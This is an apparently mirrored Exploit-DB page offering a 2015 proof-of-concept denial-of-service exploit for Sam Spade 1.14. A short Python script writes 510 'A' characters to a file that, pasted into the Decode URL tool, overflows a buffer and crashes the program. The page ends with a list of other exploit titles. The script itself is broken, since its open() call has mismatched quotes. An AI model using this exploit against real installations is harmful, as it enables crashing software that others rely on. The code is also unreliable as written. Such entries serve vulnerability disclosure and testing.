Sam Spade 1.14 – Decode URL Buffer Overflow Crash (PoC)

Exploit Database
34 阅读

作者： Vivek Mahajan

日期： 2015-11-19
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/38761/

#!/usr/bin/env python
# Exploit Title : Sam Spade 1.14 Decode URL Buffer OverflowCrash PoC
# Discovery by: Vivek Mahajan - c3p70r
# Discovery Date: 19/11/2015
# Vendor Homepage : http://samspade.org
# Software Link : http://www.majorgeeks.com/files/details/sam_spade.html
# Tested Version: 1.14
# Vulnerability Type: Denial of Service / Proof Of Concept/ Memory Overwrite
# Tested On : Windows XP SP2 ,Windows 7 SP1 x64, Windows 8.1 x64 PRO, Windows 10 x64
# Crash Point : Go to Tools > Decode URL> Enter the contents of 'spade.txt' > OK , Note: Do Remove the http://



buffer = "A"*510

file = open("spade.txt, 'w')
file.write(buffer)
file.close()


# Follow on twitter @vik.create

last Exploits
Sam Spade 1.14 – Decode URL Buffer Overflow Crash (PoC)的更多信息

Apache Commons FileUpload and Apache Tomcat – Denial of Service：
KnFTP 1.0.0 Server – Multiple Buffer Overflows (PoC) (SEH)：
ALLPlayer 5.6.2 – ‘.m3u’ Local Buffer Overflow (PoC)：
aktiv-player 2.9.0 – Crash (PoC)：
Core FTP Server FTP / SFTP Server v2 Build 674 – ‘MDTM’ Directory Traversal：
PHP 5.3.x ‘Zip’ Extension – ‘stream_get_contents()’ Denial of Service：
QEMU Guest Agent 2.12.50 – Denial of Service：
Telegram 3.2 – Input Length Handling Crash (PoC)：